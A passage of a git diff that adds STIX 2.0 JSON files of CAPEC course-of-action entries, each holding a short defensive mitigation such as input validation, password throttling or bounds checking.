b/capec/course-of-action/course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5.json new file mode 100644 index 0000000000..5321a91585 --- /dev/null +++ b/capec/course-of-action/course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--461e09dc-d2d4-4163-ab55-8ed8a345d2bd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-6", + "description": "Implementation: Disable scripting languages such as JavaScript in browser", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca.json b/capec/course-of-action/course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca.json new file mode 100644 index 0000000000..7fd189dd05 --- /dev/null +++ b/capec/course-of-action/course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5f92be12-851f-4d8d-9399-dc2457efb93a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-3", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9.json b/capec/course-of-action/course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9.json new file mode 100644 index 0000000000..e10b3e7c1d --- /dev/null +++ b/capec/course-of-action/course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6c5817bc-6cef-4bf5-a478-9dc0c7d656ec", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-79-6", + "description": "Assume all input is malicious. Create a white list that defines all valid input to the application based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19.json b/capec/course-of-action/course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19.json new file mode 100644 index 0000000000..dcccc70346 --- /dev/null +++ b/capec/course-of-action/course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ab6c299c-20bd-488a-9eff-50b7f8f91ff1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-77-3", + "description": "Use encapsulation when declaring your variables. This is to lower the exposure of your variables.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a87fdcab-083e-49ce-a3bd-729fccc5c452.json b/capec/course-of-action/course-of-action--a87fdcab-083e-49ce-a3bd-729fccc5c452.json new file mode 100644 index 0000000000..a44f393374 --- /dev/null +++ b/capec/course-of-action/course-of-action--a87fdcab-083e-49ce-a3bd-729fccc5c452.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1c267553-6267-4452-b46e-9a623c417c40", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a87fdcab-083e-49ce-a3bd-729fccc5c452", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-4", + "description": "Perform input validation for all remote content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a89e71f1-3b1c-426f-976b-18c965d09cf4.json b/capec/course-of-action/course-of-action--a89e71f1-3b1c-426f-976b-18c965d09cf4.json new file mode 100644 index 0000000000..af522ccd4f --- /dev/null +++ b/capec/course-of-action/course-of-action--a89e71f1-3b1c-426f-976b-18c965d09cf4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--feb4d9b4-7ec3-4865-9290-0d3778196712", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a89e71f1-3b1c-426f-976b-18c965d09cf4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-54-1", + "description": "Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238.json b/capec/course-of-action/course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238.json new file mode 100644 index 0000000000..7217a63b48 --- /dev/null +++ b/capec/course-of-action/course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c7cb1dec-4446-449a-a78e-383217bcc36b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a8b8e20b-4835-4d45-8d70-6e8217188238", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-49-0", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f.json b/capec/course-of-action/course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f.json new file mode 100644 index 0000000000..5f869f6eb7 --- /dev/null +++ b/capec/course-of-action/course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--259f3176-3ee4-416c-b215-6142c9c0c0ef", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-136-1", + "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c.json b/capec/course-of-action/course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c.json new file mode 100644 index 0000000000..727f2804df --- /dev/null +++ b/capec/course-of-action/course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--92c4e452-8845-4840-a600-04f84ee5794d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-15-2", + "description": "Implementation: Perform input validation for all remote content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c.json b/capec/course-of-action/course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c.json new file mode 100644 index 0000000000..2efef01f2f --- /dev/null +++ b/capec/course-of-action/course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--830a3d9d-152a-40a1-ac68-dc6fc69d7f7b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-32-2", + "description": "Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b.json b/capec/course-of-action/course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b.json new file mode 100644 index 0000000000..d6f8bde3c3 --- /dev/null +++ b/capec/course-of-action/course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e3e117d9-788c-4e2d-8335-bfcb687c2237", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877.json b/capec/course-of-action/course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877.json new file mode 100644 index 0000000000..3784ff9bdc --- /dev/null +++ b/capec/course-of-action/course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bc84619e-aba6-4cee-be92-c96262d420eb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-604-0", + "description": "Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4.json b/capec/course-of-action/course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4.json new file mode 100644 index 0000000000..06af06b9ba --- /dev/null +++ b/capec/course-of-action/course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cd4628e3-183f-47d8-91b0-ed6bb554da8c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-81-1", + "description": "Design: Validate all log data before it is output", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ab283457-b87f-426c-a8ca-40500059244b.json b/capec/course-of-action/course-of-action--ab283457-b87f-426c-a8ca-40500059244b.json new file mode 100644 index 0000000000..048cbafc3f --- /dev/null +++ b/capec/course-of-action/course-of-action--ab283457-b87f-426c-a8ca-40500059244b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a37982a7-8d87-4b0d-927b-5c803837dfed", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ab283457-b87f-426c-a8ca-40500059244b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-33-0", + "description": "HTTP Request Smuggling is usually targeted at web servers. Therefore, in such cases, careful analysis of the entities must occur during system design prior to deployment. If there are known differences in the way the entities parse HTTP requests, the choice of entities needs consideration.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ab2e7084-d1f5-4fc5-be64-f737db34936f.json b/capec/course-of-action/course-of-action--ab2e7084-d1f5-4fc5-be64-f737db34936f.json new file mode 100644 index 0000000000..8cbde998fb --- /dev/null +++ b/capec/course-of-action/course-of-action--ab2e7084-d1f5-4fc5-be64-f737db34936f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2e73b9d5-f2da-41ac-9971-92fe6f0eb7ec", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ab2e7084-d1f5-4fc5-be64-f737db34936f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-509-1", + "description": "Employ a robust password policy for service accounts. Passwords should be of adequate length and complexity, and they should expire after a period of time.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97.json b/capec/course-of-action/course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97.json new file mode 100644 index 0000000000..fb63207c5b --- /dev/null +++ b/capec/course-of-action/course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--56b97592-b85e-4edf-96fe-316dbe79fb79", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-100-1", + "description": "Use secure functions not vulnerable to buffer overflow.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a.json b/capec/course-of-action/course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a.json new file mode 100644 index 0000000000..f525817968 --- /dev/null +++ b/capec/course-of-action/course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4fb1aa42-a294-4d1e-bc39-f5eabc51bf8e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-1", + "description": "Treat all user input as untrusted data that must be validated before use.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44.json b/capec/course-of-action/course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44.json new file mode 100644 index 0000000000..73f0ab3a03 --- /dev/null +++ b/capec/course-of-action/course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--11bc7293-1858-4beb-a608-ae46e7e7f554", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-146-0", + "description": "Design: Protect the schema against unauthorized modification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f.json b/capec/course-of-action/course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f.json new file mode 100644 index 0000000000..4e45b9a080 --- /dev/null +++ b/capec/course-of-action/course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7570f92c-cadc-4faa-969e-77d488703023", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-04T00:00:00.000Z", + "modified": "2018-05-04T00:00:00.000Z", + "name": "coa-639-0", + "description": "Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--acb36d25-34d0-4233-87e6-d70570116d4d.json b/capec/course-of-action/course-of-action--acb36d25-34d0-4233-87e6-d70570116d4d.json new file mode 100644 index 0000000000..81c5c5f429 --- /dev/null +++ b/capec/course-of-action/course-of-action--acb36d25-34d0-4233-87e6-d70570116d4d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0415a253-f6b3-48c6-97a9-0ec592f1798c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--acb36d25-34d0-4233-87e6-d70570116d4d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-41-2", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a.json b/capec/course-of-action/course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a.json new file mode 100644 index 0000000000..9e2ffc8815 --- /dev/null +++ b/capec/course-of-action/course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8c25aa23-7499-44b5-8a1c-00c56ae7b836", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-151-0", + "description": "Employ robust authentication processes (e.g., multi-factor authentication).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc.json b/capec/course-of-action/course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc.json new file mode 100644 index 0000000000..f89070fe8b --- /dev/null +++ b/capec/course-of-action/course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--51ce2e15-e9fe-47e9-82df-e5e7716c0571", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ad51053f-77b9-4c9f-8c23-e40fafcfb8bc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-6-1", + "description": "Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ada16564-6893-4613-ab31-1956904689fa.json b/capec/course-of-action/course-of-action--ada16564-6893-4613-ab31-1956904689fa.json new file mode 100644 index 0000000000..8520e25d5e --- /dev/null +++ b/capec/course-of-action/course-of-action--ada16564-6893-4613-ab31-1956904689fa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--09113a77-1728-4660-b601-092e9223e001", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ada16564-6893-4613-ab31-1956904689fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-133-0", + "description": "Design: Minimize switch and option functionality to only that necessary for correct function of the command.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e.json b/capec/course-of-action/course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e.json new file mode 100644 index 0000000000..461fc4cf4a --- /dev/null +++ b/capec/course-of-action/course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f539da53-3a32-47f1-a1f7-a3fb50603c66", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-24-1", + "description": "Pre-design: Use a language or compiler that performs automatic bounds checking.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--aebeb944-089d-4f75-825e-35491ce299d5.json b/capec/course-of-action/course-of-action--aebeb944-089d-4f75-825e-35491ce299d5.json new file mode 100644 index 0000000000..97385a8451 --- /dev/null +++ b/capec/course-of-action/course-of-action--aebeb944-089d-4f75-825e-35491ce299d5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6efe21e5-a38c-4115-91e6-744367f24a63", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--aebeb944-089d-4f75-825e-35491ce299d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--aef776c9-1fbd-49f6-87a3-e52f6db91a2b.json b/capec/course-of-action/course-of-action--aef776c9-1fbd-49f6-87a3-e52f6db91a2b.json new file mode 100644 index 0000000000..e348685274 --- /dev/null +++ b/capec/course-of-action/course-of-action--aef776c9-1fbd-49f6-87a3-e52f6db91a2b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--aefbff04-1cd2-4f0a-9eb0-f60f475b34b2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--aef776c9-1fbd-49f6-87a3-e52f6db91a2b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-486-0", + "description": "To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b.json b/capec/course-of-action/course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b.json new file mode 100644 index 0000000000..ec6070e35a --- /dev/null +++ b/capec/course-of-action/course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--13ca49b9-4a5b-41bc-b4e3-942517c4d82d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-0", + "description": "Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1.json b/capec/course-of-action/course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1.json new file mode 100644 index 0000000000..c7ae7fb663 --- /dev/null +++ b/capec/course-of-action/course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--68e64b6c-8053-44a7-b036-b4e0b97c2699", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b0488086-27d5-47fc-bbdb-513ead0387b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-1", + "description": "Frequently change the SSID to new and unrelated values", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691.json b/capec/course-of-action/course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691.json new file mode 100644 index 0000000000..b8b73c2508 --- /dev/null +++ b/capec/course-of-action/course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8bc3e08e-3ffa-491a-a50d-2a0bba0deaa7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-89-2", + "description": "End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git 